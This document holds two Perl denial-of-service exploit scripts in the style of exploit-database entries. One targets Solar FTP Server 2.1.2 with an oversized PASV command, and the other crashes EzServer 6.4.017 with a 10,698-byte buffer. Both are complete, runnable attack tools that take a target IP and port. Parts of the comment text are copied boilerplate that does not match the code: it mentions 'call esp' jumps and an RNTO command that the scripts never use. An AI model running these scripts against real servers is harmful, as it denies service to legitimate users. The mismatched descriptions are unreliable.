<pre><code>#!/usr/bin/perl use IO::Socket::INET; # Exploit Title: Solar FTP Server 2.1.2 - PASV - Denial of Service (DoS) # Discovery by: Fernando Mengali # Discovery Date: 23 january 2024 # Vendor Homepage: N/A # Download to demo: https://drive.google.com/file/d/1o4xTt67bUJYAAKm0pqNIG99ly--xRQBp/view?usp=sharing # Notification vendor: No reported # Tested Version: Solar FTP Server 2.1.2 - PASV - Denial of Service (DoS) # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Denial of Service (DoS) # Vídeo: https://www.youtube.com/watch?v=U9nH6gqyT88 #1. Description #His technique works fine against Windows XP Professional Service Pack 2 and 3 (English). #For this exploit I have tried several strategies to increase reliability and performance: #Jump to a static 'call esp' #Backwards jump to code a known distance from the stack pointer. #The FTP server does not correctly handle the amount of data or bytes sent. #When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions. #Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users. #2. Proof of Concept - PoC $sis="$^O"; if ($sis eq "windows"){ $cmd="cls"; } else { $cmd="clear"; } system("$cmd"); intro(); main(); print "[+] Exploiting... \n"; print "[+] Connecting to $ip:$port\n"; my $s = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $port, Proto => 'tcp') or die "Could not connect to $host:$port\n"; $s->send("USER anon\r\n"); my $response = <$s>; print $response; $s->send("PASS anon\r\n"); $response = <$s>; print $response; $s->send("SYST\r\n"); $response = <$s>; print $response; sleep(2); $s->send("PASV " . "\x41"x6631 . "\r\n"); sleep(3); $response = <$s>; print $response; $response = <$s>; print $response; print ">>> Sending second payload\n"; $s->send("PASV " . "\x90"x123 . "\x90"x2877 . "\r\n"); $response = <$s>; print $response; sleep(2); print "[+] Done - Exploited success!!!!!\n\n"; sub intro { print "######################################################################\n"; print "# #\n"; print "# Solar FTP Server 2.1.2 - PASV - Denied of Service #\n"; print "# #\n"; print "# Coded by Fernando Mengali #\n"; print "# #\n"; print "# e-mail: fernando.mengalli\@gmail.com #\n"; print "# #\n"; print "######################################################################\n"; } sub main { our ($ip, $port) = @ARGV; unless (defined($ip) && defined($port)) { print " \nUsage: $0 <ip> <port> \n"; exit(-1); } } </code></pre>

<pre><code>#!/usr/bin/perl use IO::Socket; # Exploit Title: EzServer 6.4.017 - Denied of Service (DoS) # Discovery by: Fernando Mengali # Discovery Date: 22 january 2024 # Vendor Homepage: N/A # Download to demo: https://drive.google.com/file/d/1hCYYsWsyeuoHTh3ZosNRbtIBxw0culsu/view?usp=sharing # Notification vendor: No reported # Tested Version: EzServer 6.4.017 - Denied of Service (DoS) # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Denied of Service (DoS) #1. Description #His technique works fine against Windows XP Professional Service Pack 2 and 3 (English). #For this exploit I have tried several strategies to increase reliability and performance: #Jump to a static 'call esp' #Backwards jump to code a known distance from the stack pointer. #The FTP server does not correctly handle the amount of data or bytes sent to command RNTO. #When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denied of service conditions. #Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users. #2. Proof of Concept - PoC $sis="$^O"; if ($sis eq "windows"){ $cmd="cls"; } else { $cmd="clear"; } system("$cmd"); intro(); main(); print "[+] Exploiting... \n"; my $payload = "\x41"x10698; my $sock = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => $port, Proto => 'tcp') or die "[-] Could not connect!\n"; $sock->send($payload); $sock->close(); print "[+] Done - Exploited success!!!!!\n\n"; sub intro { print q { _/| // o\ || ._) //__\ )___( [+] EzServer 6.4.017 - Denied of Service (DoS) [*] Coded by Fernando Mengali [@] e-mail: fernando.mengalli@gmail.com } } sub main { our ($ip, $port) = @ARGV; unless (defined($ip) && defined($port)) { print " \nUsage: $0 <ip> <port> \n"; exit(-1); } } </code></pre>